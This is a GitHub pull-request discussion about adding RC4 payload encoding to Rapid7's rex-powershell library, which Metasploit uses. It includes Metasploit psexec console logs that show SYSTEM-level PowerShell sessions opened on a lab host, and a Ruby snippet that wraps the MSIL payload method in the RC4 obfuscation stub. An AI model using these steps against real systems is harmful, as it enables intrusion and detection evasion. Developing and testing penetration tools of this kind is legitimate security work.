search

rapid7 / rex-powershell

Rex library for dealing with Powershell Scripts
Other
53 stars 35 forks source link

Add option to use rc4 encoding #23

Closed bwatters-r7 closed 3 years ago

bwatters-r7 commented 4 years ago

This is a first step to supporting https://github.com/rapid7/metasploit-framework/pull/11257 by adding the option to use rc4 encoding. Together, they are still broken, so I am marking this as a draft. Please see the framework PR at https://github.com/rapid7/metasploit-framework/pull/11257 for testing strategies.

gwillcox-r7 commented 3 years ago

Right well on the plus side this appears to be working fine call wise, though results are still not as expected as mentioned in the comment above, as RC4 still does not appear to be working, though all other methods are working fine.

msf5 exploit(windows/smb/psexec) > set powershell::method msil
powershell::method => msil
msf5 exploit(windows/smb/psexec) > run

[*] 172.31.28.154:445 - Connecting to the server...
[*] 172.31.28.154:445 - Authenticating to 172.31.28.154:445|RAPID7 as user 'Administrator'...
[*] 172.31.28.154:445 - Selecting PowerShell target
[*] 172.31.28.154:445 - Executing the payload...
[+] 172.31.28.154:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 172.31.28.154:6655
[*] Powershell session session 3 opened (0.0.0.0:0 -> 172.31.28.154:6655) at 2020-09-23 14:16:55 -0500

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> exit

[*] 172.31.28.154 - Powershell session session 3 closed.  Reason: User exit
msf5 exploit(windows/smb/psexec) > set powershell::method old
powershell::method => old
msf5 exploit(windows/smb/psexec) > run

[*] 172.31.28.154:445 - Connecting to the server...
[*] 172.31.28.154:445 - Authenticating to 172.31.28.154:445|RAPID7 as user 'Administrator'...
[*] 172.31.28.154:445 - Selecting PowerShell target
[*] 172.31.28.154:445 - Executing the payload...
[+] 172.31.28.154:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 172.31.28.154:6655
[*] Powershell session session 4 opened (0.0.0.0:0 -> 172.31.28.154:6655) at 2020-09-23 14:17:18 -0500

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> exit

[*] 172.31.28.154 - Powershell session session 4 closed.  Reason: User exit
msf5 exploit(windows/smb/psexec) > set powershell::method rc4
powershell::method => rc4
msf5 exploit(windows/smb/psexec) > run

[*] 172.31.28.154:445 - Connecting to the server...
[*] 172.31.28.154:445 - Authenticating to 172.31.28.154:445|RAPID7 as user 'Administrator'...
[*] 172.31.28.154:445 - Selecting PowerShell target
[*] 172.31.28.154:445 - Executing the payload...
[+] 172.31.28.154:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 172.31.28.154:6655
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > set Powershell::method reflection
Powershell::method => reflection
msf5 exploit(windows/smb/psexec) > run

[*] 172.31.28.154:445 - Connecting to the server...
[*] 172.31.28.154:445 - Authenticating to 172.31.28.154:445|RAPID7 as user 'Administrator'...
[*] 172.31.28.154:445 - Selecting PowerShell target
[*] 172.31.28.154:445 - Executing the payload...
[+] 172.31.28.154:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 172.31.28.154:6655
[*] Powershell session session 5 opened (0.0.0.0:0 -> 172.31.28.154:6655) at 2020-09-23 14:18:19 -0500

PS C:\Windows\system32> id
PS C:\Windows\system32> id : The term 'id' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the 
spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ id
+ ~~
    + CategoryInfo          : ObjectNotFound: (id:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> exit

[*] 172.31.28.154 - Powershell session session 5 closed.  Reason: User exit
msf5 exploit(windows/smb/psexec) > set Powershell::method rc4
Powershell::method => rc4
msf5 exploit(windows/smb/psexec) > run

[*] 172.31.28.154:445 - Connecting to the server...
[*] 172.31.28.154:445 - Authenticating to 172.31.28.154:445|RAPID7 as user 'Administrator'...
[*] 172.31.28.154:445 - Selecting PowerShell target
[*] 172.31.28.154:445 - Executing the payload...
[+] 172.31.28.154:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 172.31.28.154:6655
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) >

Considering this is MSF5 though and I'm using the code from https://github.com/rapid7/metasploit-framework/pull/11257 I am curious if any of the recent additions will alter this. Going to try rebasing the other PR. Not sure if this branch needs much rebasing though.

gwillcox-r7 commented 3 years ago

Hmm still getting the same results even with the update to the latest code. Definitely something odd going on here.

smcintyre-r7 commented 3 years ago

This is failing because the RC4 template is the only template that expects the "payload" to be powershell code instead of native x86 or AMD64 code. If you look at the other templates for net, reflection, msil, etc. they all treat the payload as code in the native architecture. The RC4 template on the other hand has no such logic to execute a native payload.

This kind of makes sense because the other "methods" are all means by which the native payload can be executed not obfuscated. RC4 isn't an execution method and that's reflected in it's template. That is to say that the usage of the RC4 template code is not mutually exclusive with the other methods which take native x86 or AMD64 code and yield a powershell blob to run it.

You can test this principle by updating:

      when 'rc4'
        Rex::Powershell::Payload.to_win32pe_psh_rc4(template_path, pay)

to

      when 'rc4'
        Rex::Powershell::Payload.to_win32pe_psh_rc4(
          template_path,
          Rex::Powershell::Payload.to_win32pe_psh_msil(template_path, pay)
        )

Since these aren't mutually exclusive, and we still need a way to execute the native payload. Using the RC4 stub would need to be added in as a boolean flag and processed after the method is. If we were going to add other stubs that modify the powershell code in the future, we'd ideally be able to have them specified as some kind of an ordered specifier like rc4:msil to imply "use the RC4 wrapper ontop of the MSIL method". This would complicate tab completion though.

bwatters-r7 commented 3 years ago

Moved to https://github.com/rapid7/rex-powershell/pull/30